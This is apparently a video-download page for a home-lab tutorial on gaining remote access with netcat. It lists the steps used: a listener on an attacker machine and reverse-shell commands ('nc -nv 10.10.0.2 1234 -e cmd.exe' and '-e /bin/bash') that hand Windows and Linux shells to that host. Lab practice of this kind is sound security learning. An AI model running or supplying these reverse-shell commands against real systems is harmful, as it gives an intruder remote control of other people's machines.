Project 126 - NetCat: Gaining Remote Access To A Target System Using A Reverse Shell
Автор: Daryl Shows His Work
Загружено: 2026-01-05
Просмотров: 7
Commands Used/Steps Taken (in the order that they appear in the video):
Using a Reverse Shell to Connect to a Windows System To Obtain A Cmd Shell
1. Went back to Attacker Machine, ifconfig
2. nc -nvlp 1234 (to set up the listener)
3. Went back to Target Machine, nc -nv 10.10.0.2 1234 -e cmd.exe
4. whoami
5. dir
Using a Reverse Shell to Connect to the Linux System to Obtain A Bash Shell:
6. nc -nvlp 1234
7. In another terminal, nc -nv 10.10.0.2 1234 -e /bin/bash
8. ls -al
Доступные форматы для скачивания:
Скачать видео mp4
-
Информация по загрузке: